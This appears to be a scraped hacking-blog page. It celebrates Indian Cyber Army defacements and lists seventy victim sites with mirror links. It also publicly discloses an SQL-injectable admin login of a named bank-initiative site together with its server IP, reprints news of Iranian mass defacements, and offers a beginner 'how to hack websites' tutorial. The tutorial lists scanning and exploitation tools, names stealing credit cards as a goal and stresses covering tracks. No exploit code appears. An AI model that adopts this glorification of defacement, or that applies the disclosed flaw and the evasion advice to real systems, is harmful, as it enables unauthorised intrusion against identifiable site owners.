70 Pakistani Websites Hacked by Indian Cyber Army

70 Pakistani Websites Hacked by Indian Cyber Army

The below warning message has posted by Indian Cyber Army on all hacked websites

INDIAN CYBER ARMY STRICKED AGAIN

Defacing a few D grade security sites and barking wont make you hackers do what we did

We Stopped Concentrating your Small Porkie Cyberspace so we didnt deface anything and you took that as our weekness now your own country F**k3dup coz of your bluddy f**kin attitude and for your efame this shows how much you care for our country but we care for ours so we are offering you peace and your taking that as advantage and Barking shit this is a payback to that atleast now understand and play with your level kids

PAY BACK IS A B***H

Anything For India

JAI HIND

Maa Tujhe Salam

We are : -[SiLeNtp0is0n]- , stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k , G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor , Th3 RDX

( Greetz )

HackMypc Lucky Team Indishell , IW and ALL iNdiaN H4xoRs

Www.IndiShell.In

The list of all hacked website is mentioned below:

http://ncth.com/

http://alislam.pk/

http://lodestarcsc.com/

http://crystalhotsprings.net/

http://rootbeerreunion.com/

http://gcdlaw.com/

http://vistawiz.com/

http://mycreditcardhelpline.com/

http://natejohnson.me/

http://householdsolutions.com/

http://utcodecamp.com/index.html

http://skymountainbuilders.com/

http://sms.alislam.pk/

http://aac-utah.com/

http://acmeroadrunner.com/

http://images.silverskymedia.com/

http://shanewillard.net/

http://stats.alislam.pk/

http://precisionhomeloans.net/

http://pronethost.com/index.htm

http://silverskymedia.com/

http://beta2.utcodecamp.com/

http://careers.alislam.pk/

http://zartashia.com/index.html

http://global-auth.net/index.html

http://mindfireconsultinggroup.com/

http://biginfotainment.com/

http://paramountshpgdxb.com/

http://a-bglass.com/

http://profreewebsite.com/

http://dutchovendelights.net/

http://fatdaddyracing.com/

http://islandviewdentallab.com

http://secure.pronethost.com/

http://mashitec.org/

http://shanewillard.com/

http://kathleentesori.com/

http://prairieschoonerrestaurant.com/

http://myextrotech.com/

http://thewhosthat.com/

http://dev.crystalhotsprings.net/index.html

http://stevefarr.net/

http://api.alislam.pk/

http://signs-design.net/

http://dnn.alislam.pk/

http://creativetimes-academy.com/

http://gembatest.com/

http://interactiveasp.net/

http://secure.crystalhotsprings.net/

http://rapiddeploymentinc.com/index.html

http://xworks.com.pk/

http://lucasadamslaw.com/

http://teamcsr.org/

http://family.chandlerbuilding.com/

http://highplainsdental.com/

http://pcfxcomputers.com/

http://districtofcolumbiafamily.chandlerbuilding.com/

http://finance.alislam.pk/

http://mashitec.com/index.html

http://media.interactiveasp.net/

http://pnrglobal.org/

http://beta.silverskymedia.com/

http://freewebsite360.com/

http://softwareinteractive.net/

http://beta.utcodecamp.com/

http://auth.xworks.com.pk/

http://telcon.com.pk/index.html

http://defaultdoctor.com/index.html

http://jasoh.com/

http://sweethoneyphoto.com/index.html

The Mirror Link for all hacked websites has been listed below:

http://www.legend-h.org/mirror/145212/alislam.pk/

http://www.legend-h.org/mirror/145211/ncth.com/

http://www.legend-h.org/mirror/145222/skymountainbuilders.com/

http://www.legend-h.org/mirror/145221/utcodecamp.com/index.html

http://www.legend-h.org/mirror/145220/householdsolutions.com/

http://www.legend-h.org/mirror/145219/natejohnson.me/

http://www.legend-h.org/mirror/145218/mycreditcardhelpline.com/

http://www.legend-h.org/mirror/145217/vistawiz.com/

http://www.legend-h.org/mirror/145216/gcdlaw.com/

http://www.legend-h.org/mirror/145215/rootbeerreunion.com/

http://www.legend-h.org/mirror/145214/crystalhotsprings.net/

http://www.legend-h.org/mirror/145213/lodestarcsc.com/

http://www.legend-h.org/mirror/145257/gembatest.com/

http://www.legend-h.org/mirror/145256/creativetimes-academy.com/

http://www.legend-h.org/mirror/145255/dnn.alislam.pk/

http://www.legend-h.org/mirror/145254/signs-design.net/

http://www.legend-h.org/mirror/145253/api.alislam.pk/

http://www.legend-h.org/mirror/145252/stevefarr.net/

http://www.legend-h.org/mirror/145250/dev.crystalhotsprings.net/index.html

http://www.legend-h.org/mirror/145249/thewhosthat.com/

http://www.legend-h.org/mirror/145248/myextrotech.com/

http://www.legend-h.org/mirror/145247/prairieschoonerrestaurant.com/

http://www.legend-h.org/mirror/145246/kathleentesori.com/

http://www.legend-h.org/mirror/145245/shanewillard.com/

http://www.legend-h.org/mirror/145244/mashitec.org/

http://www.legend-h.org/mirror/145243/secure.pronethost.com/

http://www.legend-h.org/mirror/145241/fatdaddyracing.com/

http://www.legend-h.org/mirror/145242/islandviewdentallab.com

http://www.legend-h.org/mirror/145240/dutchovendelights.net/

http://www.legend-h.org/mirror/145239/profreewebsite.com/

http://www.legend-h.org/mirror/145238/a-bglass.com/

http://www.legend-h.org/mirror/145237/paramountshpgdxb.com/

http://www.legend-h.org/mirror/145236/biginfotainment.com/

http://www.legend-h.org/mirror/145235/mindfireconsultinggroup.com/

http://www.legend-h.org/mirror/145234/global-auth.net/index.html

http://www.legend-h.org/mirror/145233/zartashia.com/index.html

http://www.legend-h.org/mirror/145274/beta.utcodecamp.com/

http://www.legend-h.org/mirror/145273/softwareinteractive.net/

http://www.legend-h.org/mirror/145272/freewebsite360.com/

http://www.legend-h.org/mirror/145271/beta.silverskymedia.com/

http://www.legend-h.org/mirror/145270/pnrglobal.org/

http://www.legend-h.org/mirror/145269/media.interactiveasp.net/

http://www.legend-h.org/mirror/145268/mashitec.com/index.html

http://www.legend-h.org/mirror/145267/finance.alislam.pk/

http://www.legend-h.org/mirror/145266/districtofcolumbiafamily.chandlerbuilding.com/

http://www.legend-h.org/mirror/145265/pcfxcomputers.com/

http://www.legend-h.org/mirror/145264/highplainsdental.com/

http://www.legend-h.org/mirror/145263/family.chandlerbuilding.com/

http://www.legend-h.org/mirror/145262/teamcsr.org/

http://www.legend-h.org/mirror/145261/lucasadamslaw.com/

http://www.legend-h.org/mirror/145260/rapiddeploymentinc.com/index.html

http://www.legend-h.org/mirror/145258/interactiveasp.net/

http://www.legend-h.org/mirror/145259/secure.crystalhotsprings.net/

http://www.legend-h.org/mirror/145232/careers.alislam.pk/

http://www.legend-h.org/mirror/145231/beta2.utcodecamp.com/

http://www.legend-h.org/mirror/145230/pronethost.com/index.htm

http://www.legend-h.org/mirror/145229/precisionhomeloans.net/

http://www.legend-h.org/mirror/145228/stats.alislam.pk/

http://www.legend-h.org/mirror/145227/shanewillard.net/

http://www.legend-h.org/mirror/145226/images.silverskymedia.com/

http://www.legend-h.org/mirror/145225/acmeroadrunner.com/

http://www.legend-h.org/mirror/145224/aac-utah.com/

http://www.legend-h.org/mirror/145223/sms.alislam.pk/

http://www.legend-h.org/mirror/145210/sweethoneyphoto.com/index.html

http://www.legend-h.org/mirror/145209/jasoh.com/

http://www.legend-h.org/mirror/145208/defaultdoctor.com/index.html

http://www.legend-h.org/mirror/145207/telcon.com.pk/index.html

http://www.legend-h.org/mirror/145206/auth.xworks.com.pk/

I Invite all my Hacker Friends

"We are coming up with an exclusive edition of our magazine “Beyond the News” and also publishing a book on “Cyber Terrors”, I would like to invite maximum interviews and opinions of hackers on this issue. Below I have give a few questions if you can answer then please post them to amarjit@freehacking.net & cyberterrors@gmail.com." Thanks.

1. What is Cyber Army for you & what is the motive behind any cyber army ?

2. Are you member of any Cyber Amry ?

3. What is Cyber Terrorism for you ?

4. Difference Between Cyber War & Cyber Terrorism ?

5. Who are Blackhats ?

6. Difference Between L33t & n00b ?

7. Are you professional hackers ?

8. What kind of finance back up is there for hackers ?

9. Are you government approved ?

10. Why don't you inform Govt regarding flaws in systems ?

11. Which are the websites which have been hacked recently by you ?

12. There was recently news that Vijay Mallya’s website was hacked ? Comments pls ?

13. There are lot of Indian politicians and other bigwigs whose money is lying in Swiss bank accounts ? How do you hack these accounts ?

14. How can one learn hacking & become pro like you guys ?

15. Have you heard of Bruce Sterling book "The Hacker Crackdown" where they gave an interview with the head of the New York Police Department? He says hackers are principally not good at creative programming. What do you think about it?

16. Is it hard to penetrate into the "closed" computer systems?

17. What objects on the territory of India and Pakistan represent real interest for hackers?

18. What hacker achievements could you tell us about? Both you own achievements and you like about other hackers?

19. I think hacking is probably unsafe, isn't it? There are some appropriate authorities like Cyber Crime Department that fights computer crime, don't they?

20. Do you think you are a criminal?

21. Why is the image of a hacker associated with romantics of 21st century for some people, and with crimes and computer piracy for others?

22. Is it true, that hackers break into corporate computer systems and steal the source code to satisfy their curiosity, but later on deny the stories that any hacking has happened into the Indian Security Intelligence sites ?

23. How did people come to know about you and how do multiply your business ?

24. Since you are in anonymity in the online world, especially the cyber security sector, is there insecurity and paranoia associated ?

25. Ever since the era when you were an illegal hacker, and the contemporary landscape, how easy is it to hack a computer? Has security improved much? Have things changed vis a vis what you did years ago?

26. This is just for understanding as to how vulnerable is the common user?

27. What does social engineering mean in the context of hacking ?

28. How do they use this concept of social engineering ? Any live example pls.

29. How would you consider the safety of online banking and credit cards online usage ?

30. Do you also use online banking for monetary transactions ?

31. What achievements in cyber space made you a celebrity overnight in your community ?

32. When you hear "CBI," that's got to be a bit chilling. Is it ?

33. As you come online and maintain full anonymity, is it still possible to trace you out ? How ?

34. Do you have brainstorming sessions with your team ?

35. Do you also share the skills within your team ?

36. What does crew means in any hacker group ?

37. Do you sign contracts with your clients ? If have any ?

38. I think you attract a lot of media attention ? How does it feel ?

39. What are your other hobbies apart hacking ?

40. Have you yourself ever been hacked ?

41. What can you tell us about iPhone hacking ? What is the technology involved ?

42. What do you see as the future of hacking in the next 5 years?

43. who funds you for these activities ?

44. what is punishment for hacking ?

45. How many hackers really have threat from police or intelligence

46. have you ever challenged Bilgates?

47. dont you think hackers are challenge for I T secotrs?

48. Are you delbarately acting on behalf of some IT company to pramote their business?

49. Do your family & friends know about you hacking activities ?

50. What are you views on current cyber terrorism ?

Punjabi Hackers Found SQL Injection Vulnerability in ICICI Learning Matrix Webite

Punjabi Hackers Found SQL Injection Vulnerability in ICICI Learning Matrix Webite www.learningmatrixatcampus.co.in.....Thanks to Adnan Anjum for this Information. His Email id is adnan@freehacking.net

The Learning Matrix is ICICI initiative. website link is www.learningmatrixatcampus.co.in

The administrator login page of this website is vulnerable to SQL Injection Attack

Learning Matrix Administrator Login page link is www.learningmatrixatcampus.co.in/admin

Any average hacker can get access into the admin panel of this website. Check the screen shoots for the same.

Web server on which the site is hosted is http://202.54.111.218/. Any one can get full access to this server and steal the sensitive information from the server.

Punjabi Hackers Found SQL Injection Vulnerability in ICICI Learning Matrix Webite www.learningmatrixatcampus.co.in

Thanks to Adnan Anjum for this Information. His Email id is adnan@freehacking.net

Indian Cyber Army [ICA] Hacked Chinese Website

Indian Cyber Army [ICA] Hacked Chinese Website http://www.szsaic.com.cn/

The Indian Cyber Army hacked Chinese Website. Hacker has mention the below warning message:

Indian Cyber Army Have arrived, sit back, get some popcorn and enjoy the show . . . . .

HaCkED By 3thical Noob and DarkL00k aka Ajay Dhaka - Indian Cyber Army & IndiShell

root@localhost

root@localhost ~ server rooted successfully

root@localhost ~ you got hacked.

root@localhost ~ your security fucked by ICA team

root@localhost ~ India is great

STOP PROXY WAR AGGAINST INDIA OTHERWISE WE WILL MAKE YOUR CYBER SPACE INTO HELL.

'We are : stranger , -[SiLeNtp0is0n]- , inX_rOot , NEO H4cK3R , DarkL00k , G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI , Th3 RDX'+

gr33tz t0: HackMypc Lucky Team Indishell , IW and ALL iNdiaN H4xoRs

"KASHMIR IS OURS .. DONT MAKE POLITICS ON THIS MATTER"

Iran's Cyber Army Hacks 1,000 US, British, French Gov't Websites

An Iranian cyber group announced that it has hacked more than 1,000 important governmental websites of the US, Britain and France in protest at their support and financial aids to anti-Iran terrorist groups.

"To commemorate the Day of Campaign against Terrorism and the martyrdom anniversary of (former Iranian President Mohammad Ali) Rajayee and (his Prime Minister Mohammad Javad) Bahonar (by the terrorist Mojahedin-e Khalq Organization), the group rose to protest at the inhumane measures of the supporters of terrorism, with the US and Britain standing on top of them, through a new method and hacked and changed the pages of more than 1,000 of their websites," Behrouz Kamalian, Head of the Iranian Ashiyaneh (nest) cyber group, told FNA on Monday.

If you open the hacked sites now, you can see a logo of Iran and some pictures of martyrs Rajaee and Bahonar and a bi-lingual text in Persian and English expressing our group's protest at the US, Britain and France's attitude towards terrorism, Kamalian added.

Noting that the project started on Saturday and continued until Monday morning, he reminded that the group managed to hack more than 1,000 governmental sites of the aforementioned countries, including the official website of Louisiana state in the US, Britain's Pevensey city council and other websites.

"All of the hacked websites have been registered at this address: www.zone-h.org," Kamalian added.

His remarks came after the Islamic Revolution Guards Corps (IRGC) announced in March that its cyber teams have hacked 29 websites affiliated with the US espionage network.

The IRGC has recently set up a new center to detect and combat organized crimes on the internet.

The newly-established center is tasked with monitoring the internet to detect and campaign against organized crimes, espionage, economic and social corruption, money laundering and cultural inroad.

Iran has said many times in the past that the western government's support for the MKO proves that their claims about advocating human rights are nothing but lies.

The MKO members last month celebrated the anniversary of their group's bomb attack on the central office of Jomhuri Eslami party in Tehran in 1981 in which 72 party members, including senior Iranian political and religious officials, were martyred.

The MKO, whose main stronghold is in Iraq, is blacklisted by much of the international community, including the United States.

Before an overture by the EU, the MKO was on the European Union's list of terrorist organizations subject to an EU-wide assets freeze. Yet, the MKO puppet leader, Maryam Rajavi, who has residency in France, regularly visited Brussels and despite the ban enjoyed full freedom in Europe.

Some other members of the MKO who have had a role in the assassination of a large number of Iranian citizens and officials are currently living in France.

The group started assassination of Iranian citizens and officials after the Islamic Revolution in a bid to take control of the newly established Islamic Republic. It killed several of Iran's new leaders in the early years after the revolution, including Rajayee, Bahonar and the then Judiciary Chief, Mohammad Hossein Beheshti who were killed in bomb attacks by MKO members in 1981.

The group fled to Iraq in 1986, where it was protected by Saddam Hussein and where it helped the Iraqi dictator suppress Shiite and Kurd uprisings in the country.

Many of the MKO members have abandoned the terrorist organization while most of those still remaining in the camp are said to be willing to quit but are under pressure and torture not to do so.

A May 2005 Human Rights Watch report accused the MKO of running prison camps in Iraq and committing human rights violations.

According to the Human Rights Watch report, the outlawed group puts defectors under torture and jail terms.

Numerous articles and letters posted on the Internet by family members of MKO recruits confirm reports of the horrific abuse that the group inflicts on its own members and the alluring recruitment methods it uses.

The most shocking of such stories includes accounts given by former British MKO member Ann Singleton and Mustafa Mohammadi -- the father of an Iranian-Canadian girl who was drawn into the group during an MKO recruitment campaign in Canada.

Mohammadi recounts his desperate efforts to contact his daughter, who disappeared several years ago - a result of what the MKO called a 'two-month tour' of Camp Ashraf for teenagers.

He also explains how the group forces the families of its recruits to take part in pro-MKO demonstrations in Western countries by threatening to kill their loved ones.

Lacking a foothold in Iran, the terrorist group recruits ill-informed teens from Iranian immigrant communities in Western states and blocks their departure afterwards.

Iran's Cyber Army Hacks 1,000 US, British, French Gov't Websites

"Explore The Unexplored"

SOURCE: Cyber Terror

Ankit August 30 at 3:01pm Report

Respected Sister,

Now a days, people say Ethical Hackers with their bad eyes... As per their thinking the correct word is unethical appears for the group like pakhaxors etc... Ethical hackers are working for crime agencies. Ethical Hackers are a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. I think you should post correct meaning of Ethical Hacking at least for the people who betrays from the name of Ethical Hacker...

I heard couple of times that often people say: there is nothing in my system. I don't mine if the hacker enters into my computer. Actually, they don't know what the bad guy can do once he/she enters into his/her system... Try to aware the people about this... In fact, when I tell to my online friends to secure their self; they don't concentrate on my sentences... They just like to roam into any site but they are unware about their privacy...

You can write this quote into your book - "The modern thief can steal more with a computer than with a gun. Tomorrow's terrorist may be able to do more damage with a keyboard than with a bomb".

– National Research Council, "Computers at Risk", 1991. I found it here: http://www.crime-research.org/analytics/702/ I'm in short of time right so will catch you later... Hey my writing skill isn't good :)... It was a real pleasure to write to you...

Regards,

Ankit...

you may write your suggestions to amarjit@freehacking.net, cyberterrors@gmail.com or to editorafternoonvoice@gmail.com

How to Hack Websites & Servers from Scratch : Step by Step Tutorial for Beginners

How to Hack Websites & Servers from Scratch : Step by Step Tutorial for Beginners

How to Hack Website | How to Hack Web Server | Step by Step Hacking Video Tutorial | Hack Using NESSUS & METASPLOIT | Step by Step User Guide

In Depth Security Assessment With a Full Report Detailing Vulnerabilities Discovered Using NESSUS & OpenVas: Learn how to Hack a Website & Webserver

NOTE: I'm going to provide the common methodology that is followed when hacking a machine/network/server. This tutorial will give you a good understanding & an overview about professional penetration testing in a black box (attacker) point of view. It is designed to give you an idea on how an attacker can break into your system, what I am gonna say will increase your awareness & will open the door for you to go out & educate yourself easily. I gathered this information from various sources and tutorials, i have changed many things, clarified many parts, given some references, and put a lot of information together. I'm still a learner & on the way to my goal. However, this won't prevent me from teaching others what i have learned so far & don't worry, i'm not going to provide you with any info that i'm not sure about yet. It is not the best tutorial out there, but at least it is a good starter. I will speak in a hacker (attacker or blackbox) point of view. I write this tutorial for educational purposes only.

Hi Readers, continuing to my posts The best vulnerability scanner software and assessment tool: Nessus & The Best Penetration Testing and Vulnerability Exploitation Tool: Metasploit Framework

Yesterday I have posted an article regarding how to hack an password. That post was for kidies who take hacking as a fun. Now today this post is for advance readers. Here I am going to share some real hacking techniques using which one can hack any server or website. This post is for educational purpose only.

NOTE: No scans will be initiated against any systems/server until the outline of the system/server owner assessment plan is confirmed as acceptable to owner.

Tools Used during penetration testing are freely available on internet:

1. NESSUS
2. OpenVAS Server
3. OpenVAS Client
4. Nmap
5. Nikto
6. SQLix download here or here
7. SQLMap
8. Metasploit

Before you hack a system, you must decide what your goal is. Are you hacking to put the system down, gaining sensitive data, breaking into the system and taking the 'root' access, screwing up the system by formatting everything in it, discovering vulnerabilities & see how you can exploit them, etc ... ? The point is that you have to decide what the goal is first.

The most common goals are:

1. Breaking into the system & taking the admin privileges.
2. Gaining sensitive data, such as credit cards, identification theft, etc.

You should have all of your tools ready before you start taking the steps of hacking. There is a Unix version called backtrack. It is an Operating System that comes with various sets of security tools that will help you hack systems (penetration tests).

You should set the steps (methodology) that you plan to take in your journey before you do anything else. There is a common methodology followed

by hackers, i will mention it below. However, you can create your own methodology if you know what you are doing.

Steps need to be followed to hack a server is as cited below:

1. Do a manual review of the target system or server to get an overview of the target. This is phase-1 and known as Reconnaissance.
2. Second step is Service enumeration. Here you have to use Nmap to determine what services are open and available for manual testing. This is phase-2 and known as Scanning. To know how to perform Enumeration and footprinting attack, visit this link.
3. The third step is Scanning target to find the vulnerabilities. This is also part of phase-2 Scanning. For this you have to use NESSUS or OPEN VAS. These tools will scan all open ports, regardless of common and defaulted settings. This will confirm listening services and check those against a database of exploitable services. To see if you are running any services that are mis-configured or vulnerable to exploits. To know how NESSUS works visit this link. If you want to working of NESSUS...OR How to use NESSUS visit this link. To visit NESSUS video tutorials available on internet visit this link.
4. You can also use Nikto. It will used to check the web server(s) for mis-configurations and exploitable web applications. To know how Nikto works visit this link.
5. After all these scanning, play with SQL. Use SQLiX and Sqlmap for this. You can also use few more SQL tools, softwares and techniques. To know these underground SQL tips n tricks visit this link.
6. The next step is to get access on system using the vulnerabilities found. This is phase-3 known as Gaining Access on remote system. This you can achieve using Metasploit software. To know how to use metasploit, visit this link. Here you will all the available video tutorial for metasploit. A very good to start. Using these videos you can easily learn how to use metasploit. The most up to date video for Metasploit 3 can be found here: Exploring Metasploit 3 and the New and Improved Web Interface – Part 1 & Exploring Metasploit 3 and the New and Improved Web Interface – Part 2. A good flash tutorial that shows you step by step how to use it: Metasploit at Iron Geek. There’s a presentation by HD Moore himself at Cansecwest 2006: csw06-moore.pdf And a couple of videos spawned from that here: Computer defense – TASK Presentation
7. The next step is to maintain you access on the compromised system. This is phase-4 and known as Maintaining Access.
8. THIS IS THE MOST IMPORTANT STEP AND THE LAST PHASE. This is phase-5 known as Covering Tracks. After you activities, you must remove all your track records....;) othet wise you know...IT act is very strong.

This tutorial is designed to provide you with recommendations for securing your server against the majority of attackers. Below are some sample reports showing Nessus and OpenVas. It is recommended that always run multiple scanning tools. Never rely on a single automated scanning. Automated scanners miss a lot and are prone to false positives.

Nessus Scan Multiple Hosts

Sample Report

OpenVas Scan Multiple Hosts

Sample Report

Nessus Scan (CentOS5)

Sample Report

OpenVas Scan (Centos5)

Sample Report

Nessus Scan Report (RHEL4U4)

Sample Report

OpenVas Scan Report (RHEL4U4)

Sample Report

Nessus Scan (Ubuntu 810)

Sample Report

OpenVas Scan (Ubuntu 810)

Sample Report

Nessus Scan (Win2k3)

Sample Report

OpenVas Scan (Win2k3)

Sample Report

Please report any problem OR broken link to us on amarjit@freehacking.net. You can also leave a comment here.

How to Hack Websites & Servers from Scratch : Step by Step Tutorial for Beginners

How to Hack Website | How to Hack Web Server | Step by Step Hacking Video Tutorial | Hack Using NESSUS & METASPLOIT | Step by Step User Guide

In Depth Security Assessment With a Full Report Detailing Vulnerabilities Discovered Using NESSUS & OpenVas: Learn how to Hack a Website & Webserver